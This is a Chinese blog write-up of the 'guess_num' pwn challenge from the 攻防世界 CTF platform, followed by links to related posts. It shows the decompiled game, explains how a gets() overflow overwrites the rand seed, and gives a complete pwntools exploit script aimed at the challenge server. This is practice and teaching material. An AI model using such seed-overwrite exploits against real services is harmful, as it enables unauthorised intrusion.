攻防世界-guess_num-Writeup

最新推荐文章于 2022-02-18 20:00:00 发布
最新推荐文章于 2022-02-18 20:00:00 发布
阅读量459 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106147835
版权

guess_num

[collapse title=“展开查看详情” status=“false”]

考察点:利用栈溢出固定随机数

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+4h] [rbp-3Ch]
  int i; // [rsp+8h] [rbp-38h]
  int v6; // [rsp+Ch] [rbp-34h]
  char v7; // [rsp+10h] [rbp-30h]
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v4 = 0;
  v6 = 0;
  *(_QWORD *)seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:", 0LL);
  gets((__int64)&v7);							//栈溢出
  srand(seed[0]);
  for ( i = 0; i <= 9; ++i )                    // 连续正确10次
  {
    v6 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v4);
    puts("---------------------------------");
    if ( v4 != v6 )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}

由于题目开启 Canary 不能直接控制 eip ,观察栈空间发现 v7 位于 seed 前面。

-000000000000003C var_3C          dd ?
-0000000000000038 var_38          dd ?
-0000000000000034 var_34          dd ?
-0000000000000030 v7              db ?
-000000000000002F                 db ? ; undefined
-000000000000002E                 db ? ; undefined
						…………
						…………
-0000000000000010 seed            dd 2 dup(?)
-0000000000000008 var_8           dq ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)

随机数的随机性是基于 seed 种子,当固定 seed 时,实际上生成的是伪随机数,也就是一个固定的值。这道题几时利用 gets 造成栈溢出覆盖 seed 固定生成随机数,配合 ctypes 库实现 python、c 混合编程。

完整exp:

#!usr/bin/python
#coding=utf-8
from pwn import *
from ctypes import *

context.log_level = ';debug';

p = remote("111.198.29.45",57280)
#p = process(';./b59204f56a0545e8a22f8518e749f19f';)


libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = "a" * 0x20 + p64(1)
p.recvuntil(';Your name:';)
p.sendline(payload)
libc.srand(1)

for _ in range(10):
	num = str(libc.rand()%6+1)
	p.recvuntil(';number:';)
	p.sendline(num)

p.interactive()

[/collapse]

SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[攻防世界]guess_num
逆向萌新的博客
06-01 674
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 623
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
攻防世界PWN-guess_num
Deeeelete的博客
11-16 661
题目:guess_num checksec查看详情 64位以及各种防护全开 运行一下逻辑,的确是一个猜数游戏 进64位IDA 反编译main函数 出源码 摘代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { FILE *v3; // rdi@1 __int64 v4; // rax@1 const char *v5; // rdi@1 __int64 result; // rax@7 __in
攻防世界guess_num
weixin_52296042的博客
10-29 153
我们分析程序如果v4 = v6 连续十次则循环结束,然后执行后面函数获得flag 如果数字不等则退出 我们观察栈空间发现var-30(v7)与seed相差0x20。 然后我们可以利用gets函数的天然漏洞,覆盖seed为3, 下面是脚本。我们可以利用ldd file查看libc。这里利用ctypes库实现python、c混合编程 脚本中的cat_flag函数地址是多余的 新人博客,如果错误。请大佬指正 ...
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
《空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透》这篇文章讲述了在Windows环境下针对Discuz! 3.4版本进行渗透测试的过程。本文将深入解析其中涉及的关键知识点,包括authkey的作用、Windows短文件名的安全...
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问题和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问题,恳请指正。 电子邮件:
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1282
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
setbuf函数详解
涛行无疆的专栏
10-28 2万+
程序输出有两种方式:一种是即时处理方式,另一种是先暂存起来,然后再大块写入的方式,前者往往造成较高的系统负担。因此,c语言实现通常都允许程序员进行实际的写操作之前控制产生的输出数据量。 这种控制能力一般是通过库函数setbuf实现的。如果buf是一个大小适当的字符数组,那么: setbuf(stdout,buf); 语句将通知输入/输出库,所有写入到stdout的输出都应该使用buf作为输出
[BUUCTF-pwn] stack2,stack3,stack4,stack3-rop
weixin_52640415的博客
02-18 592
这几个题像是哪哪哪讲从入门...课的例题。 题目的main函数是相同的,没有问题。 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[256]; // [rsp+10h] [rbp-100h] BYREF setbuf(stdin, 0LL); setbuf(stdout, 0LL); setbuf(stderr, 0LL); puts("welcome to stack2");
rand()与srand() 攻防世界guess_num write_up
kwist_jay的博客
06-15 471
srand设置产生一系列伪随机数发生器的起始点,要想把发生器重新初始化,可用1作seed值。任何共它的值都把发生器匿成一个随机的起始点。rand检索生成的伪随机数。在任何调用srand之前调用rand与以1作为seed调用srand产生相同的序列。 此函数可以设定rand函数所用的随机数产生演算法的种子值。任何大于一的种子值都会将rand随机数所产生的虚拟随机数序列重新设定一个起始点 ...
XCTF-pwn-guess_num - Writeup
菜小狗.的博客
08-11 6674
学习就是一个积累的过程 在这个过程中就是为了让迷迷糊糊的东西变得明朗起来的一个过程^_ ^ 所以往往在这个过程中会付出很多的时间来一点点积累~ 按照惯例看一下题目基本情况和它的保护情况等 开启了canary,不能直接栈溢出咯~ 下一步按照惯例该丢到ida里分析了。 可以看到sub_C3E()函数是可以调用system的 再main函数的后半段发现只要将输入的值十次v4都等于v6即可进入 su...
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7610
[CTF题目总结-web篇]攻防世界-warmup
stderr和stdout详细解说
热门推荐
数据之美的博客
04-07 2万+
cstdio> object stderr FILE * stderr; Standard error stream The standard error stream is the defaultdestination for error messages and other diagnostic warnings. Like stdout, itis usuall
【CTF刷题之旅】XCTF嘉年华体验赛逆向题re2的writeup
iqiqiya的博客
10-22 1373
这道题采用动静结合的方法尝试了一下 动态调试的时候想加快进度  跳过sleep()  遇到那两个jle跳转   直接修改SF标志位为0来修改执行流程  可以看到 左侧箭头会变成虚线 对了   第三个jle在sub_400C9A()中 main()函数如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { uns...
Blind_pwn之格式化字符串
蚁景网安学院
07-07 991
可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 bin...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值